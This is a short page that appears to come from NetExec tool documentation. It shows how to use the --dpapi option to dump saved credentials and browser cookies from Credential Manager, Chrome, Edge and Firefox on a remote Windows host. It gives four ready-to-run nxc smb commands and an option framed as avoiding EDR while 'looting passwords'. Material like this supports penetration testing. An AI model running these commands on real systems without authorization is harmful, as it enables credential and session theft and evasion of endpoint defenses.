Dump DPAPI

Dump DPAPI credentials using NetExec

You can dump DPAPI credentials using NetExec using the following option: --dpapi. It will get all secrets from Credential Manager, Chrome, Edge, Firefox. --dpapi supports the following options :

cookies : Collect every cookies in browsers
nosystem : Won't collect system credentials. This will prevent EDR from stopping you from looting passwords 🔥

You need at least local admin privilege on the remote target, use --local-auth if your user is a local account

nxc smb <ip> -u user -p password --dpapi
nxc smb <ip> -u user -p password --dpapi cookies
nxc smb <ip> -u user -p password --dpapi nosystem
nxc smb <ip> -u user -p password --local-auth --dpapi nosystem

PreviousDump LSASS NextDump with BackupOperator Priv

Last updated 10 months ago

Was this helpful?